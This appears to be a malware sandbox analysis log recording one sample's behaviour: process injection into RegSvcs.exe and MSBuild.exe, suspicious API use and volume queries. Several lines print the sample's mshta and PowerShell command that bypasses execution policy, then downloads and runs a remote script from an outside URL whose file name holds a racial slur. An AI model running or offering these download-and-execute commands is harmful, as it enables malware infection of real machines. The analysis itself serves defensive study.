Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7B22E mov eax, dword ptr fs:[00000030h]	5_2_05C7B22E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_04FF1277 mov eax, dword ptr fs:[00000030h]	6_2_04FF1277
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 16_3_00F70283 mov eax, dword ptr fs:[00000030h]	16_3_00F70283
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 17_3_00F70283 mov eax, dword ptr fs:[00000030h]	17_3_00F70283

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C7B701 GetProcessHeap,RtlAllocateHeap,IsBadReadPtr,RtlAllocateHeap,VirtualFree,RtlAllocateHeap,

5_2_05C7B701

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, B.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(processInformation.ProcessHandle, ref BaseAddress, IntPtr.Zero, ref RegionSize, allocationType, protect)
Source: 5.2.RegSvcs.exe.37a79f4.0.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 5.2.RegSvcs.exe.37a79f4.0.raw.unpack, Flutter.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 5.2.RegSvcs.exe.37a79f4.0.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\mshta.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 102D008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 801008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 81A008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: D1B008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 11EF008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 54A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 552000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 226008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 916	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 784	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;

Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:vje=['run', 'powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;start-sleep -seconds 3;', 'wscript.shell', 'scripting.filesystemobject']; new activexobject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new activexobject('scripting.filesystemobject');vfx.deletefile(wscript.scriptfullname);"
Source: unknown	Process created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:epd=['run', 'powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;start-sleep -seconds 3;', 'wscript.shell', 'scripting.filesyste
Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:vje=['run', 'powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;start-sleep -seconds 3;', 'wscript.shell', 'scripting.filesystemobject']; new activexobject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new activexobject('scripting.filesystemobject');vfx.deletefile(wscript.scriptfullname);"
Source: unknown	Process created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:epd=['run', 'powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;start-sleep -seconds 3;', 'wscript.shell', 'scripting.filesyste

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C76DEA _snwprintf,_snwprintf,OpenMutexW,OpenMutexW,_snwprintf,OpenMutexW,GetCurrentProcessId,ProcessIdToSessionId,InitializeSecurityDescriptor,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,CloseHandle,

5_2_05C76DEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C7440E calloc,memset,GetCurrentProcess,LoadLibraryW,GetModuleFileNameW,rand,free,memset,rand,free,free,VirtualProtect,VirtualProtect,VirtualProtect,GetCurrentProcess,FlushInstructionCache,time,srand,CreateEventW,rand,strtok,strtok,_mbsdup,free,_mbsdup,CreateTimerQueue,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,EqualSid,RtlConvertSidToUnicodeString,FreeSid,free,CloseHandle,GetCurrentProcessId,rand,memset,CreateTimerQueueTimer,free,WaitForSingleObject,DeleteTimerQueueEx,CloseHandle,calloc,RtlAllocateHeap,HeapFree,GetProcessHeap,VirtualFree,strlen,free,free,free,

5_2_05C7440E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
